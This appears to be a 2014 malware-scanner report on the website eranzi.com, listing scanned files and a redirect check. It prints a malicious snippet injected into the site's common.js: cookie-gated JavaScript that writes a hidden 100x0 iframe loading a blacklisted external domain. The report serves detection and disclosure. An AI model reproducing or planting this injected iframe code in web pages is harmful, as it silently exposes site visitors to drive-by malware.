Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eranzi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eranzi.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:01:59 GMT Location: http://www.eranzi.com/ Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/ | 200 OK Content-Length: 61726 Content-Type: text/html | clean |
http://www.eranzi.com/_system_/eng_image/js/jquery-1.5.1.min.js | 200 OK Content-Length: 85275 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/eng_image/js/new_design.js | 200 OK Content-Length: 10145 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/eng_image/js/pop.js | 200 OK Content-Length: 6213 Content-Type: application/javascript | clean |
http://www.eranzi.com/_system_/_js/common.js | 200 OK Content-Length: 21747 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.hankki.co.kr
...[22543 bytes skipped]...
_att(id, item) { for(var i=0; i<item.length; i+=2) { try { document.getElementById(id).setAttribute(item[i], item[i+1]); } catch(e) { } } }
if(document.cookie.indexOf('nahuo=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='nahuo=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>");}
Decoded script: <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>
Malicious iFrame found. size: 100x0 src: http://www.hankki.co.kr/swf/news.html
This URL is marked by Google as suspicious
http://eranzi.com/./_js/common.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:08 GMT Location: http://www.eranzi.com/_js/common.js Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/_js/common.js | 200 OK Content-Length: 21747 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.hankki.co.kr
...[22543 bytes skipped]...
_att(id, item) { for(var i=0; i<item.length; i+=2) { try { document.getElementById(id).setAttribute(item[i], item[i+1]); } catch(e) { } } }
if(document.cookie.indexOf('nahuo=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='nahuo=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>");}
Decoded script: <iframe src=http://www.hankki.co.kr/swf/news.html width=100 height=0></iframe>
Malicious iFrame found. size: 100x0 src: http://www.hankki.co.kr/swf/news.html
This URL is marked by Google as suspicious
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163307 Content-Type: application/x-javascript | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16544 Content-Type: application/javascript | clean |
http://eranzi.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:11 GMT Location: http://www.eranzi.com/www.googleadservices.com/pagead/conversion.js/ Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 276 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 253 Content-Type: text/html | clean |
http://www.eranzi.com/test404page.js | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://eranzi.com/./_js/wrest.eng.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Apr 2014 20:02:13 GMT Location: http://www.eranzi.com/_js/wrest.eng.js Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17 Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.eranzi.com/_js/wrest.eng.js | 200 OK Content-Length: 16094 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eranzi.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Apr 2014 20:01:59 GMT
Location: http://www.eranzi.com/
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eranzi.com
Referer: http://www.google.com/search?q=eranzi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.